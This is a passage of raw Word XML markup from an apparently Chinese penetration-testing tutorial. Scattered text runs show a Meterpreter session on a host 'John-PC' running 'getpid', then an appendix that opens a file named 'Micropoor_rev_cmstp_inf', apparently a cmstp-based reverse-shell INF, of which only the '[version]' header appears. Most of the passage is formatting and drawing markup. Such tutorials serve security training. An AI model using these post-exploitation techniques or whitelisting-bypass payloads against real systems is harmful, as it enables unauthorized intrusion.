          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\John</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getpid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8632</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="8182" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12</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6" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>附录：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micropoor_rev_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmstp_inf：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="91"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:32.500pt;width:0.500pt;height:254.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,650" coordsize="10,5090">
        <v:shape style="position:absolute;left:10390;top:650;width:10;height:5090" coordorigin="10390,650" coordsize="10,5090" path="m10402,654l10402,654,10402,654,10402,654,10402,654,10402,655,10402,655,10402,655,10402,655,10402,656,10402,657,10402,657,10402,658,10402,660,10402,661,10402,663,10402,665,10402,667,10402,669,10402,672,10402,675,10402,678,10402,682,10402,686,10402,691,10402,696,10402,702,10402,707,10402,714,10402,721,10402,728,10402,736,10402,744,10402,753,10402,763,10402,773,10402,784,10402,795,10402,807,10402,820,10402,833,10402,848,10402,862,10402,878,10402,894,10402,912,10402,929,10402,948,10402,968,10402,988,10402,1010,10402,1032,10402,1055,10402,1079,10402,1104,10402,1130,10402,1157,10402,1185,10402,1213,10402,1243,10402,1274,10402,1306,10402,1340,10402,1374,10402,1409,10402,1446,10402,1483,10402,1522,10402,1562,10402,1604,10402,1646,10402,1690,10402,1735,10402,1781,10402,1829,10402,1878,10402,1928,10402,1980,10402,2033,10402,2087,10402,2143,10402,2200,10402,2259,10402,2319,10402,2381,10402,2444,10402,2508,10402,2575,10402,2642,10402,2712,10402,2783,10402,2855,10402,2929,10402,3005,10402,3083,10402,3162,10402,3243,10402,3325,10402,3410,10402,3496,10402,3584,10402,3673,10402,3765,10402,3858,10402,3953,10402,4050,10402,4149,10402,4250,10402,4353,10402,4457,10402,4564,10402,4673,10402,4783,10402,4896,10402,5010,10402,5127,10402,5246,10402,5367,10402,5490,10402,5615,10402,5742e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:31.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,630" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:630;width:8990;height:390" coordorigin="1490,630" coordsize="8990,390" path="m1510,654l1510,654,1510,654,1510,654,1510,654,1510,654,1510,654,1511,654,1512,654,1512,654,1514,654,1515,654,1517,654,1519,654,1521,654,1524,654,1528,654,1532,654,1536,654,1541,654,1546,654,1552,654,1559,654,1566,654,1575,654,1583,654,1593,654,1603,654,1615,654,1627,654,1640,654,1654,654,1668,654,1684,654,1701,654,1719,654,1738,654,1758,654,1780,654,1802,654,1826,654,1851,654,1877,654,1904,654,1933,654,1963,654,1995,654,2028,654,2063,654,2099,654,2136,654,2175,654,2216,654,2259,654,2303,654,2348,654,2396,654,2445,654,2496,654,2549,654,2604,654,2660,654,2719,654,2779,654,2841,654,2906,654,2972,654,3041,654,3112,654,3184,654,3259,654,3336,654,3416,654,3498,654,3582,654,3668,654,3757,654,3848,654,3941,654,4037,654,4136,654,4236,654,4340,654,4446,654,4555,654,4666,654,4780,654,4897,654,5017,654,5139,654,5264,654,5392,654,5523,654,5657,654,5793,654,5933,654,6076,654,6222,654,6370,654,6522,654,6677,654,6835,654,6997,654,7161,654,7329,654,7500,654,7675,654,7853,654,8034,654,8219,654,8407,654,8598,654,8793,654,8992,654,9194,654,9400,654,9609,654,9823,654,10039,654,10260,654,10484,654,10484,654,10484,654,10484,654,10484,654,10484,654,10484,654,10484,654,10484,654,10484,654,10484,654,10484,655,10484,655,10484,655,10484,655,10484,655,10484,655,10484,655,10484,655,10484,656,10484,656,10484,656,10484,656,10484,657,10484,657,10484,657,10484,658,10484,658,10484,659,10484,659,10484,660,10484,660,10484,661,10484,662,10484,662,10484,663,10484,664,10484,665,10484,666,10484,667,10484,668,10484,669,10484,670,10484,671,10484,672,10484,673,10484,675,10484,676,10484,677,10484,679,10484,681,10484,682,10484,684,10484,686,10484,687,10484,689,10484,691,10484,693,10484,696,10484,698,10484,700,10484,702,10484,705,10484,707,10484,710,10484,713,10484,715,10484,718,10484,721,10484,724,10484,727,10484,731,10484,734,10484,737,10484,741,10484,745,10484,748,10484,752,10484,756,10484,760,10484,764,10484,768,10484,773,10484,777,10484,782,10484,786,10484,791,10484,796,10484,801,10484,806,10484,811,10484,817,10484,822,10484,828,10484,833,10484,839,10484,845,10484,851,10484,858,10484,864,10484,870,10484,877,10484,884,10484,891,10484,898,10484,905,10484,912,10484,920,10484,927,10484,935,10484,943,10484,951,10484,959,10484,967,10484,976,10484,984,10484,993,10484,1002,10484,1011,10484,1020,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10483,1030,10482,1030,10482,1030,10480,1030,10479,1030,10477,1030,10475,1030,10473,1030,10470,1030,10466,1030,10462,1030,10458,1030,10453,1030,10448,1030,10442,1030,10435,1030,10428,1030,10419,1030,10411,1030,10401,1030,10391,1030,10379,1030,10367,1030,10354,1030,10340,1030,10326,1030,10310,1030,10293,1030,10275,1030,10256,1030,10236,1030,10215,1030,10192,1030,10168,1030,10143,1030,10117,1030,10090,1030,10061,1030,10031,1030,9999,1030,9966,1030,9931,1030,9895,1030,9858,1030,9819,1030,9778,1030,9735,1030,9691,1030,9646,1030,9598,1030,9549,1030,9498,1030,9445,1030,9391,1030,9334,1030,9275,1030,9215,1030,9153,1030,9088,1030,9022,1030,8953,1030,8883,1030,8810,1030,8735,1030,8658,1030,8578,1030,8497,1030,8413,1030,8326,1030,8238,1030,8146,1030,8053,1030,7957,1030,7859,1030,7758,1030,7654,1030,7548,1030,7439,1030,7328,1030,7214,1030,7097,1030,6977,1030,6855,1030,6730,1030,6602,1030,6471,1030,6337,1030,6201,1030,6061,1030,5918,1030,5773,1030,5624,1030,5472,1030,5317,1030,5159,1030,4997,1030,4833,1030,4665,1030,4494,1030,4319,1030,4141,1030,3960,1030,3776,1030,3587,1030,3396,1030,3201,1030,3002,1030,2800,1030,2594,1030,2385,1030,2172,1030,1955,1030,1734,1030,1510,1030,1510,1030,1510,1030,1510,1030,1510,1030,1510,1030,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1029,1510,1028,1510,1028,1510,1028,1510,1028,1510,1027,1510,1027,1510,1027,1510,1026,1510,1026,1510,1026,1510,1025,1510,1025,1510,1024,1510,1024,1510,1023,1510,1022,1510,1022,1510,1021,1510,1020,1510,1019,1510,1018,1510,1017,1510,1016,1510,1015,1510,1014,1510,1013,1510,1012,1510,1011,1510,1009,1510,1008,1510,1006,1510,1005,1510,1003,1510,1002,1510,1000,1510,998,1510,996,1510,994,1510,992,1510,990,1510,988,1510,986,1510,984,1510,981,1510,979,1510,976,1510,974,1510,971,1510,968,1510,966,1510,963,1510,960,1510,956,1510,953,1510,950,1510,946,1510,943,1510,939,1510,936,1510,932,1510,928,1510,924,1510,920,1510,916,1510,911,1510,907,1510,902,1510,898,1510,893,1510,888,1510,883,1510,878,1510,873,1510,867,1510,862,1510,856,1510,850,1510,845,1510,839,1510,833,1510,826,1510,820,1510,813,1510,807,1510,800,1510,793,1510,786,1510,779,1510,772,1510,764,1510,757,1510,749,1510,741,1510,733,1510,725,1510,717,1510,708,1510,700,1510,691,1510,682,1510,673,1510,664,1510,654e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:1.800pt;height:2.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:50.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1010" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1010;width:8990;height:390" coordorigin="1490,1010" coordsize="8990,390" path="m1510,1030l1510,1030,1510,1030,1510,1030,1510,1030,1510,1030,1510,1030,1511,1030,1512,1030,1512,1030,1514,1030,1515,1030,1517,1030,1519,1030,1521,1030,1524,1030,1528,1030,1532,1030,1536,1030,1541,1030,1546,1030,1552,1030,1559,1030,1566,1030,1575,1030,1583,1030,1593,1030,1603,1030,1615,1030,1627,1030,1640,1030,1654,1030,1668,1030,1684,1030,1701,1030,1719,1030,1738,1030,1758,1030,1780,1030,1802,1030,1826,1030,1851,1030,1877,1030,1904,1030,1933,1030,1963,1030,1995,1030,2028,1030,2063,1030,2099,1030,2136,1030,2175,1030,2216,1030,2259,1030,2303,1030,2348,1030,2396,1030,2445,1030,2496,1030,2549,1030,2604,1030,2660,1030,2719,1030,2779,1030,2841,1030,2906,1030,2972,1030,3041,1030,3112,1030,3184,1030,3259,1030,3336,1030,3416,1030,3498,1030,3582,1030,3668,1030,3757,1030,3848,1030,3941,1030,4037,1030,4136,1030,4236,1030,4340,1030,4446,1030,4555,1030,4666,1030,4780,1030,4897,1030,5017,1030,5139,1030,5264,1030,5392,1030,5523,1030,5657,1030,5793,1030,5933,1030,6076,1030,6222,1030,6370,1030,6522,1030,6677,1030,6835,1030,6997,1030,7161,1030,7329,1030,7500,1030,7675,1030,7853,1030,8034,1030,8219,1030,8407,1030,8598,1030,8793,1030,8992,1030,9194,1030,9400,1030,9609,1030,9823,1030,10039,1030,10260,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1030,10484,1031,10484,1031,10484,1031,10484,1031,10484,1032,10484,1032,10484,1032,10484,1033,10484,1033,10484,1033,10484,1034,10484,1034,10484,1035,10484,1036,10484,1036,10484,1037,10484,1038,10484,1038,10484,1039,10484,1040,10484,1041,10484,1042,10484,1043,10484,1044,10484,1045,10484,1046,10484,1047,10484,1048,10484,1050,10484,1051,10484,1053,10484,1054,10484,1056,10484,1057,10484,1059,10484,1061,10484,1063,10484,1065,10484,1067,10484,1069,10484,1071,10484,1073,10484,1075,10484,1078,10484,1080,10484,1083,10484,1085,10484,1088,10484,1091,10484,1094,10484,1096,10484,1100,10484,1103,10484,1106,10484,1109,10484,1113,10484,1116,10484,1120,10484,1123,10484,1127,10484,1131,10484,1135,10484,1139,10484,1144,10484,1148,10484,1152,10484,1157,10484,1161,10484,1166,10484,1171,10484,1176,10484,1181,10484,1186,10484,1192,10484,1197,10484,1203,10484,1209,10484,1214,10484,1220,10484,1226,10484,1233,10484,1239,10484,1246,10484,1252,10484,1259,10484,1266,10484,1273,10484,1280,10484,1287,10484,1295,10484,1302,10484,1310,10484,1318,10484,1326,10484,1334,10484,1342,10484,1351,10484,1359,10484,1368,10484,1377,10484,1386,10484,1395,10484,1405,10484,1405,10484,1405,10484,1405,10484,1405,10484,1405,10484,1405,10483,1405,10482,1405,10482,1405,10480,1405,10479,1405,10477,1405,10475,1405,10473,1405,10470,1405,10466,1405,10462,1405,10458,1405,10453,1405,10448,1405,10442,1405,10435,1405,10428,1405,10419,1405,10411,1405,10401,1405,10391,1405,10379,1405,10367,1405,10354,1405,10340,1405,10326,1405,10310,1405,10293,1405,10275,1405,10256,1405,10236,1405,10215,1405,10192,1405,10168,1405,10143,1405,10117,1405,10090,1405,10061,1405,10031,1405,9999,1405,9966,1405,9931,1405,9895,1405,9858,1405,9819,1405,9778,1405,9735,1405,9691,1405,9646,1405,9598,1405,9549,1405,9498,1405,9445,1405,9391,1405,9334,1405,9275,1405,9215,1405,9153,1405,9088,1405,9022,1405,8953,1405,8883,1405,8810,1405,8735,1405,8658,1405,8578,1405,8497,1405,8413,1405,8326,1405,8238,1405,8146,1405,8053,1405,7957,1405,7859,1405,7758,1405,7654,1405,7548,1405,7439,1405,7328,1405,7214,1405,7097,1405,6977,1405,6855,1405,6730,1405,6602,1405,6471,1405,6337,1405,6201,1405,6061,1405,5918,1405,5773,1405,5624,1405,5472,1405,5317,1405,5159,1405,4997,1405,4833,1405,4665,1405,4494,1405,4319,1405,4141,1405,3960,1405,3776,1405,3587,1405,3396,1405,3201,1405,3002,1405,2800,1405,2594,1405,2385,1405,2172,1405,1955,1405,1734,1405,1510,1405,1510,1405,1510,1405,1510,1405,1510,1405,1510,1405,1510,1405,1510,1405,1510,1405,1510,1405,1510,1405,1510,1404,1510,1404,1510,1404,1510,1404,1510,1404,1510,1404,1510,1404,1510,1404,1510,1403,1510,1403,1510,1403,1510,1403,1510,1402,1510,1402,1510,1402,1510,1401,1510,1401,1510,1400,1510,1400,1510,1399,1510,1399,1510,1398,1510,1397,1510,1397,1510,1396,1510,1395,1510,1394,1510,1393,1510,1392,1510,1392,1510,1390,1510,1389,1510,1388,1510,1387,1510,1386,1510,1384,1510,1383,1510,1382,1510,1380,1510,1379,1510,1377,1510,1375,1510,1373,1510,1372,1510,1370,1510,1368,1510,1366,1510,1363,1510,1361,1510,1359,1510,1357,1510,1354,1510,1352,1510,1349,1510,1346,1510,1344,1510,1341,1510,1338,1510,1335,1510,1332,1510,1328,1510,1325,1510,1322,1510,1318,1510,1314,1510,1311,1510,1307,1510,1303,1510,1299,1510,1295,1510,1291,1510,1286,1510,1282,1510,1277,1510,1273,1510,1268,1510,1263,1510,1258,1510,1253,1510,1248,1510,1242,1510,1237,1510,1231,1510,1226,1510,1220,1510,1214,1510,1208,1510,1202,1510,1195,1510,1189,1510,1182,1510,1175,1510,1168,1510,1161,1510,1154,1510,1147,1510,1140,1510,1132,1510,1124,1510,1116,1510,1108,1510,1100,1510,1092,1510,1083,1510,1075,1510,1066,1510,1057,1510,1048,1510,1039,1510,1030e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:50.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1010" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:1010;width:30;height:390" coordorigin="1490,1010" coordsize="30,390" path="m1517,1030l1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1030,1517,1031,1517,1031,1517,1031,1517,1031,1517,1032,1517,1032,1517,1032,1517,1033,1517,1033,1517,1033,1517,1034,1517,1034,1517,1035,1517,1036,1517,1036,1517,1037,1517,1038,1517,1038,1517,1039,1517,1040,1517,1041,1517,1042,1517,1043,1517,1044,1517,1045,1517,1046,1517,1047,1517,1048,1517,1050,1517,1051,1517,1053,1517,1054,1517,1056,1517,1057,1517,1059,1517,1061,1517,1063,1517,1065,1517,1067,1517,1069,1517,1071,1517,1073,1517,1075,1517,1078,1517,1080,1517,1083,1517,1085,1517,1088,1517,1091,1517,1094,1517,1096,1517,1100,1517,1103,1517,1106,1517,1109,1517,1113,1517,1116,1517,1120,1517,1123,1517,1127,1517,1131,1517,1135,1517,1139,1517,1144,1517,1148,1517,1152,1517,1157,1517,1161,1517